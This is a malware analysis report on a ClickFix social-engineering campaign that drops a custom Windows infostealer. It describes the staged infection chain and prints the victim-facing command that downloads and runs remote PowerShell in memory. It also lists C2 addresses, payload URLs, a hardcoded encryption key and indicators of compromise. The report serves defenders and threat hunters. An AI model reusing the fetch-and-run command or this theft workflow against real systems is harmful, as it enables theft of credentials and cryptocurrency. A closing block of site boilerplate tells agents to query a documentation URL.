# ClickFix Campaign – Russian Threat Actor Evolves to Custom InfoStealer
## Executive Summary
This report provides an update on the ongoing ClickFix campaign that was previously partially analyzed by myself and shared [internally](https://medium.com/@tarunrd77/when-verify-youre-human-becomes-malware-execution-0c6e9540779d). At the time of the earlier investigation, the final payload was identified as Vidar Stealer. Around the same period, the team at [LevelBlue](https://www.levelblue.com/blogs/spiderlabs-blog/how-clickfix-opens-the-door-to-stealthy-stealc-information-stealer) published a blog highlighting a separate ClickFix domain that followed the same multi-stage infection chain and leveraged the same download endpoint, although their observed final payload was StealC, the current campaign delivers a new **custom stealer, VodkaStealer**.
In this current wave, the campaign demonstrates a **significant evolution** in both malware design and operational infrastructure:
* The final payload has transitioned to a **custom C/C++ stealer**, **hereafter referred to as VodkaStealer**, replacing previous commodity malware families.
* While the **download URL** remains consistent with prior campaigns, the **C2 infrastructure** has shifted geographically and technologically, now observed under a US-registered domain and IP.
* Operational behaviors such as a **Russian keyboard layout kill-switch**, **custom AES-CTR encrypted C2 communications**, and **fileless browser data exfiltration techniques** indicate a **financially motivated private actor**, rather than a generic Malware-as-a-Service operation.
Additional observations suggest that the actor is **Russian-speaking and operates within the CIS region**, with infrastructure rotation spanning Germany, Ukraine, and the USA. The malware is specifically designed to target **cryptocurrency wallets, browser credentials, and password manager data** using an extensive hardcoded list of browser extensions and wallet IDs.
In summary, the campaign reflects a **highly targeted, well-maintained, and evolving threat**, demonstrating advanced techniques for evading detection and maintaining persistence while focusing on high-value financial data.
## Key Findings
* **Campaign Evolution & Payload**
* Previous final payloads: **Vidar Stealer** and **StealC**.
* Current final payload: **VodkaStealer** (custom native C/C++ stealer).
* Download URL remains unchanged, maintaining operational continuity.
* C2 infrastructure rotated from **Germany → Ukraine → USA**.
* **Infection Chain**
* Multi-stage execution process:
* **Stage 0:** Compromised ClickFix domain with fake verification prompts.
* **Stage 1:** PowerShell stager running in-memory scripts.
* **Stage 2:** PowerShell loader performing process injection.
* **Stage 3:** Donut shellcode loader downloading next-stage payload.
* **Stage 4:** Final custom stealer.
* Stealth techniques include **hidden windows**, **silent error handling**, and **process injection**.
* **System & Browser Targeting**
* **Browsers:** Google Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, Chromium, Firefox, Waterfox, LibreWolf, Pale Moon.
* **Credential theft:**
* Extracts stored passwords, cookies, session data.
* Specifically targets **password manager extensions** (Bitwarden, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, ZohoVault).
* **Cryptocurrency wallets:** Over **120 targeted wallet extensions** including MetaMask, Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, and more.
* **Operational Security & Anti-Detection Features**
* Russian keyboard layout kill-switch avoids domestic systems.
* Mutex creation prevents multiple instances.
* Uses **fileless techniques** and **in-memory execution** to evade AV detection.
* Incorporates **Chrome ABE bypass** via open-source post-exploitation tool (`chromelevator.bin`).
* Process injection into **svchost.exe** or self-injection fallback.
* **System Reconnaissance & Profiling**
* Collects detailed system information:
* Windows version, installation date
* CPU, GPU, RAM, screen resolution
* Locale, timezone, and username
* Installed software enumeration (registry-based)
* Creates staging directory for collected information.
* Captures screenshots for situational awareness.
* **Exfiltration & Communication**
* Establishes TCP connection to **178.16.55.40:5555**.
* Performs **AES-CTR encrypted channel handshake** with hardcoded key `systeminfo_aes256_channel_key_2024!!`.
* Recursively uploads all collected files after verification of server acknowledgment.
* Cleans up local staging files post-exfiltration.
* **Persistence Indicators**
* Creates **marker file `sysinfo_user_marker`** to log first execution date/time.
* Prevents re-infection of the same system.
* **Attribution & Threat Actor Profile**
* Likely Russian-speaking actor within the **CIS region**.
* Highly targeted, financially motivated, private actor.
* Operational sophistication surpasses standard commodity malware campaigns.
## Infection Chain
{% @mermaid/diagram content="flowchart TD
A\["ClickFix Domain"]
\--> B\["Victim Executes Malicious PowerShell iex(irm -UseBasicParsing)"]
B --> C\["Stage 1: PowerShell Stager Hidden Window, In-Memory Execution"]
C --> D\["Stage 2: PowerShell Loader Downloads & Injects Payload"]
D --> E\["Stage 3: Donut Shellcode Enables SeDebugPrivilege Injects into svchost.exe"]
E --> F\["Stage 4: VodkaStealer (C/C++)"]
F --> G\["System Recon & Victim ID"]
F --> H\["Browser & Wallet Theft Chromium + Firefox 120+ Crypto Wallets Password Managers"]
F --> I\["Additional Data Theft Telegram, FileZilla, OpenVPN"]
F --> J\["Bypasses Chromium App-Bound Encryption (chromelevator.bin)"]
F --> K\["Data Staging in Temp Directory"]
K --> L\["C2 Communication 178.16.55.40:5555 AES-CTR Encrypted"]
L --> M\["Recursive Upload → Cleanup"]
M --> N\["Creates Marker File sysinfo\_user\_marker"]
" %}
## Technical Analysis
### Stage 0: ClickFix Domain
During recent hunting activity focused on ClickFix infrastructure, we identified continued campaign activity with notable payload evolution.
This campaign was previously partially analyzed and findings were shared internally. In the present iteration, although the payload has changed, the download URL pattern remains consistent with previously documented infrastructure, reinforcing linkage to earlier activity.
The domain observed in this wave is: captoolsz\[.]com. The domain appears to be compromised or otherwise controlled by a malicious actor and is used to present a fake verification prompt designed to socially engineer victims into executing a malicious command.
The victim is instructed to execute a command that downloads and runs a remote PowerShell script directly in memory using: `powershell -c iex(irm -UseBasicParsing)`
Infrastructure rotation is evident. The previously documented IP address was 91.92.240.219, while the current observed IP is 158.94.209.33. This indicates active backend management and evasive rotation practices.
### Stage 1: Powershell Stager
The initial PowerShell stager displays the message: `“Wait please, don't close this window...”`
The script then spawns a new hidden PowerShell process using New-Object System.Diagnostics.ProcessStartInfo. The newly created process executes additional PowerShell code that retrieves and executes further payload content directly in memory.
The window style is explicitly set to hidden in order to prevent visible artifacts. If an error occurs during execution, exceptions are silently caught and suppressed, allowing the script to terminate without alerting the user. This behavior reflects deliberate operational stealth.
### Stage 2: Powershell Loader
The PowerShell loader retrieves a binary payload from the previously observed endpoint. Rather than executing the file in a conventional manner, the loader performs process injection, enabling the payload to execute in memory without standard disk-based execution artifacts.\
This stage marks the transition from script-based execution to native code execution, increasing complexity and reducing detection opportunities.
### Stage 3: VodkaStealer Loader
The downloaded binary is identified as Donut-generated shellcode, consistent with earlier ClickFix campaign behavior. After decryption using a donut-decryptor, analysis shows that the payload immediately hides its execution window.
die.exe
The malware calls AdjustTokenPrivileges with SeDebugPrivilege enabled, granting debug privileges required for advanced process injection techniques.
Two primary functions are executed at this stage. The first function downloads the next-stage payload, and the second function locates svchost.exe and performs process injection into it.
The endpoint used to download the next stage is `http[:]//94.157.35.115/user_profiles_photo/cptchbuild.bin`, which matches previously documented infrastructure.
### Stage 4: VodkaStealer
The final payload is again delivered as Donut shellcode. After decryption, previously used Vidar stealer has been replaced with **VodkaStealer, a custom native C/C++ stealer.**
die.exe
The stealer begins by hiding its execution window.
It checks the current keyboard layout and terminates execution if the layout is Russian. This behavior suggests either Russian-speaking threat actors or intentional avoidance of infecting Russian systems.
A mutex named sysinfo\_single\_instance is created to prevent multiple instances of the VodkaStealer from running on the same system.
The VodkaStealer iterates through eight Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium. It checks whether these browsers are installed and then searches for specific hardcoded extension IDs within each browser profile. If matching extensions are found, the browser index is stored for further processing.
VodkaStealer enumerates running processes, identifies active browser processes, and terminates them to unlock browser database files before extracting stored credentials and wallet data.
The stealer queries ip-api.com/json to retrieve the victim’s public IP address and country code.
It generates a victim identifier using the MachineGuid value and retrieves the current UserName.
System reconnaissance includes collecting the Windows product name, installation date, CPU name, CPU core count, GPU information, RAM size, screen resolution, locale information, and time zone using registry queries and Windows APIs.
A working directory is created in the Temp folder for staging collected information with the following format, `sysinfo_countrycode_ipaddr_DayMonthYearHourMinute` example: `sysinfo_IN_8.8.8.8_18020261010`
VodkaStealer creates InstalledSoftware.txt and queries the registry paths SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and SOFTWARE\WOW6432Node\Windows\CurrentVersion\Uninstall to enumerate installed applications. The collected software information is written to InstalledSoftware.txt.
VodkaStealer then proceeds to collect data from Chromium-based browsers, focusing on cryptocurrency wallet extensions and password managers
A screenshot of the victim machine is captured and saved in the staging directory.
The malware then downloads chromelevator.bin from `http[:]//94.157.35.115/user_profiles_photo/chromelevator.bin`.
It attempts to locate svchost.exe and inject the payload using process injection. If injection into svchost.exe fails, it performs self-injection.
The chromelevator.bin component is an open-source post-exploitation tool designed to bypass Chromium’s App-Bound Encryption (ABE). It uses direct syscalls and reflective process hollowing to launch a legitimate browser process in a suspended state and inject a payload to hijack its security context. This fileless technique enables decryption and exfiltration of sensitive Chromium data, including cookies, saved passwords, and payment information.
It is a open-source tool is available at
VodkaStealer also checks for the presence of Firefox-based browsers, including Firefox, Waterfox, LibreWolf, and Pale Moon. It attempts to harvest credentials and cookies by extracting logins.json, key4.db, cookies.sqlite, and related certificate databases from their profile directories.
In addition to standard browser credential theft, the malware specifically targets Chromium-based password manager extensions. It searches for hardcoded extension IDs associated with password managers including Bitwarden, RoboForm, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, and ZohoVault. If these extensions are installed, the malware attempts to extract stored vault data and associated extension storage files.
VodkaStealer separately targets cryptocurrency wallet browser extensions. It contains an extensive hardcoded list of more than 120 wallet extension IDs. Targeted wallets include MetaMask (multiple IDs), Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, Ronin, Keplr, Rabby, Exodus, Zerion, SafePal, Rainbow, Tonkeeper, Uniswap, XDEFI, Crypto.com, Hashpack, Gero, MathWallet, TrezorPassword, TronLink, TokenPocket, BybitWallet, BackpackWallet, MagicEdenWallet, Temple, PetraAptos, MartianAptos, and PontemAptos.
The malware also collects FileZilla credentials, Telegram Desktop session data, and OpenVPN Connect profiles. All collected data is staged within the central working directory.
It creates a file called systeminfo.txt and writes the below collected information in it.
For exfiltration, the malware validates the target directory and establishes a TCP socket connection to 178.16.55.40 on port 5555. It performs a custom AES-based handshake and establishes two AES-CTR encrypted communication channels. The hardcoded encryption key used is “systeminfo\_aes256\_channel\_key\_2024!!”.\
Below is the directory structure or how it would look like:
```
C:\Users\Username\AppData\Local\Temp\sysinfo_countrycode_ipaddr_DayMontYearHourMinute\
│
├─InstalledSoftwares.txt
├─systeminfo.txt
├─screenshot.jpg
├─BrowserWallets
│ ├─Chrome
│ │ ├─Default
│ │ │ ├─WalletData.db
│ │ │ ├─extension_storage.json
│ │ │ └─cookies.json
│ │ └─Profile1
│ │ ├─WalletData.db
│ │ ├─extension_storage.json
│ │ └─cookies.json
│ ├─Edge
│ │ └─Default
│ │ ├─WalletData.db
│ │ ├─extension_storage.json
│ │ └─cookies.json
│ └─OtherBrowsers(Braze,Opera,Vivaldi)
│
├─BrowserPassManagers
│ ├─Bitwarden
│ │ ├─vault.json
│ │ └─local_storage.json
│ ├─LastPass
│ │ ├─vault.json
│ │ └─local_storage.json
│ ├─1Password
│ └─KeePassXC
│
├─DesktopWallets
│ ├─MetaMask
│ │ ├─wallet.json
│ │ └─keyfile.json
│ ├─TrustWallet
│ └─CoinbaseWallet
│
├─PassManagers
│ ├─Dashlane
│ ├─Keeper
│ ├─MYKI
│ └─ZohoVault
│
├─Browsers
│ ├─Chrome
│ │ ├─Default
│ │ │ ├─cookies.json
│ │ │ ├─logins.json
│ │ │ ├─key4.db
│ │ │ └─fingerprint.json
│ │ └─Profile1
│ │ ├─cookies.json
│ │ ├─logins.json
│ │ ├─key4.db
│ │ └─fingerprint.json
│ ├─Edge
│ │ ├─Default
│ │ │ ├─cookies.json
│ │ │ ├─logins.json
│ │ │ ├─key4.db
│ │ │ └─fingerprint.json
│ ├─Firefox
│ │ ├─Profiles
│ │ │ ├─logins.json
│ │ │ ├─key4.db
│ │ │ ├─cookies.sqlite
│ │ │ └─cert9.db
│ │ ├─Waterfox
│ │ ├─LibreWolf
│ │ └─PaleMoon
│ ├─Brave
│ ├─Opera
│ └─Vivaldi
│
├─Telegram
│ └─SessionData.json
├─FileZilla
│ └─credentials.xml
└─OpenVPN
└─profiles
├─client.ovpn
└─credentials.txt
```
The victim identifier is transmitted to the C2 server, and the malware recursively uploads the staged directory contents. It waits for an “OK” confirmation from the server before cleaning up and deleting all staged files.
Finally, the malware creates a marker file in the Temp directory named sysinfo\_user\_marker. The file records the first execution time in the format “First run: DD/MM/YYYY HH:MM:SS”. This marker is used to indicate that the system has already been infected and processed.
## IOC
| Indicator | Value |
| --------------------------------------------- | ---------------------------------------------------------------- |
| ClickFix Domain | captoolsz\[.]com |
| Stealer Download Url | http\[:]//94.157.35.115/user\_profiles\_photo/cptchbuild.bin |
| Chromium ABE bypass component | http\[:]//94.157.35.115/user\_profiles\_photo/chromelevator.bin |
| Current ClickFix C2 / staging IP | 158.94.209.33 |
| Previous infrastructure IP | 91.92.240.219 |
| Current TCP socket C2 server for exfiltration | 178.16.55.40:5555 |
| Mutex | sysinfo\_single\_instance |
| Stealer Loader Download Url | http\[:]//94.157.35.115/user\_profiles\_photo/cptch.bin |
| cptchbuild.bin | 4f6afc69c3151bbc71f86417dbf8cca0eed89b47c66d3e0d8712bfd4eba87a00 |
| cptch.bin | f9eb41e9989ac7ce9c1ece15a7e7c4a0adef1434444598f28c6ba5d20daf1352 |
| chromelevator.bin | c8dbd5335dc0828556e6abc2a804121bf65240719a8a3388a5af6b65065a2d5b |
| decrypted\_cptch.bin | 6437db6158ee8fa2d316ba3625ca8df6afdb9304bb3c1e6ee4fb0bcdabb7f212 |
| decrypted\_cptchbuild.bin | 8720d5388e561835e5496498f61de3132e6e63f2d47964ace897ecb528e2fec3 |
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://xto9ot.gitbook.io/malware-analysis/clickfix-campaign-russian-threat-actor-evolves-to-custom-infostealer.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.